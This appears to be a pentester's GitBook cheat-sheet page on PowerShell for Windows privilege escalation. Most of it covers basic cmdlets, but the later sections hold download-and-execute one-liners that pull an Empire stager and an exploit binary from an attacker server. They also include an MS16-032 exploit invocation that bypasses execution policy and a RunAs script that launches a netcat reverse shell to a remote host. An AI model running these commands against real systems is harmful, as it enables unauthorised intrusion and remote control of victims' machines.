Pentest
  • Homepage
  • Pentest Links
  • 01 Prep
    • Target Inventory
    • OSINT and Dorks
    • Recon-ng dns zone snoop
    • ❤️Gitbook
  • 02 Scan
    • *Favorites
    • Burp
    • Dirb nikto wpscan etc
    • Enum Finger and Brute SSH
    • Fuzzing
    • Nmap
    • Open Port Checks OneLiner
    • Port Knocking
    • SSL Issues
    • Tcpdump
  • 03 Getting In
    • Char Evasion Tricks
    • Email SMTP
    • Eternal Blue
    • FTP
    • heartbleed
    • Metasploit
    • MySql
    • NFS
    • Oracle
    • Postgres
    • PowerShell Empire
    • Shells
    • rpc
    • SMB Samba
    • SSH Tips
    • SQLite3
    • Veil
  • 04 WebApps
    • Apache
    • Blogs
    • Coldfusion
    • Content Management (CMS)
    • Drupal
    • Elastix FreePBX
    • HttpFileServer (HFS)
    • IIS
    • IIS6 WebDav
    • Local File Inclusion (LFI)
    • Magento
    • Nagios
    • PFSense
    • php
    • php type juggling
    • phpLite
    • Web Injections
    • Javascript
    • Shellshock
    • SQL Injections (sqli)
    • SQLMap
    • WAF
    • Webmin
    • Web Scrape
    • Wordpress
  • 05 Passwords & Ciphers
    • Cipher Decrypt
    • Cipher RSA Wiener P-Q-E
    • Cracking
    • Dict Guess List Mangle
    • Get Hashes
    • Hydra Brutes
    • Images Exif Steg
    • Malware Analysis
    • Pull Hashes PCredz
    • SSH PrivKey Passphrase
    • Unzip Crack
    • Windows PW
  • 06 Linux PrivEsc
    • 1 Look Around
    • 2 Enums
    • 3 PrivEsc
    • 4 Kernel Exploits
    • 5 Looting
    • binaries
    • Buffer Overflow
    • bash prison
    • Monitor Files
    • mongodb node
    • Pivots
    • Remote Execute
    • Shell TTY Fix
    • TAR backups
    • Transfer Files
    • vnc
  • 07 Windows PrivEsc
    • 1 Windows cmd kungfu
    • 2 Enums
    • 3 PrivEsc
    • 4 Kernel Exploits
    • 5 Looting
    • Bloodhound
    • DLL Hijack MSF
    • Kerberos
    • Memory Analysis
    • NTDS
    • Powershell
    • Responder
    • Saved Creds runas
Powered by GitBook
On this page
  • Get Command
  • Alias and Children
  • Help
  • Create/Delete
  • Shorcuts
  • Find the Fields related to the processes
  • ForEach Loops
  • Find Services
  • Ping Sweeps
  • Downloads
  • Download and Execute
  • One Liner to run from CMD
  • Powershell RunAs

Was this helpful?

  1. 07 Windows PrivEsc

Powershell

Get Command

ps> Get-Command -Noun process
ps> Get-Command -Verb get
ps> Get-Command set*
ps> Get-Command *process

Alias and Children

PS> Get-Alias ls
PS> Get-Alias -Definition Get-ChildItem
PS> Get-ChildItem HKLM:  ..Registry
PS> Get-ChildItem cert:   ..Cert Store

Help

PS> Get-Help Get-ChildItem
PS> help Get-ChildItem
PS> help Get-ChildItem -detailed
PS> help Get-ChildItem -examples   #best stuff here

Create/Delete

PS> echo hello > file1.txt
PS> echo hello > file2.txt
PS> echo hello > file3.txt
PS> Remove-Item *.txt -WhatIf   .. will show you but not delete !!!

Shorcuts

PS> ls -recurse
PS> ls -rec
PS> ls -r

Find the Fields related to the processes

IE: Name, PID
PS> Get-Process | Get-Member
PS> ps | gm
PS> ps | format-list -property name, id, starttime
PS> ps | Format-Table
PS> ps | ft *    ..will try to jam everything into a table (ugly)

ForEach Loops

% = ForEach-Object Alias

PS> ps -name nc | ForEach-Object {$_ * 5}
PS> 100,200,500 | % {$_ * 5}

PS> ps -name nc | % {stop-process $_}

Find Services

PS> Get-Service | Where-Object { $_.Status -eq ""running"" } | Sort-Object -Property name -Descending

PS> Get-Service | fl *   #format list                     ..ugly!
PS> Get-Service | Select-Object servicename, displayname  ..much better
PS> Get-Service | Select servicename, displayname         ..much better!
PS> Get-Service | Select servicename, displayname | gm

Ping Sweeps

PS> 1..255 | % {echo ""10.10.10.$_""; ping -n 1 -w 100 10.10.10.$_ | select-string ttl}

Downloads

PS> cd .\Desktop\
PS> wget http://$IP:8000/launcher.bat -OutFile launcher.bat
PS> dir
PS> notepad ./launcher.bat

Download and Execute

python -m SimpleHTTPServer 8080

powershell "IES(New-Object Net.WebClient).downloadString('http://10.x.x.x:8080/empire.ps1')"
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.x.x.x:8080/40564.exe', 'c:\Users\Public\Downloads\40564.exe')"

One Liner to run from CMD

MS16-032 
https://www.exploit-db.com/exploits/39719/

> powershell -ExecutionPolicy ByPass -command "& { . C:\Users\Public\Invoke-MS16-032.ps1; Invoke-MS16-032 }"

Powershell RunAs

  • PowerShell can also be used to launch a process as another user.

  • Simple script will run a reverse shell as the specified username and password.

$username = '<username here>'
$password = '<password here>'
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force
$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword
Start-Process -FilePath C:\Users\Public\nc.exe -NoNewWindow -Credential $credential -ArgumentList ("-nc","$IP","4444","-e","cmd.exe") -WorkingDirectory C:\Users\Public

> powershell -ExecutionPolicy ByPass -command "& { . C:\Users\public\PowerShellRunAs.ps1; }"
PreviousNTDSNextResponder

Last updated 2 years ago

Was this helpful?

REF:

TransferFiles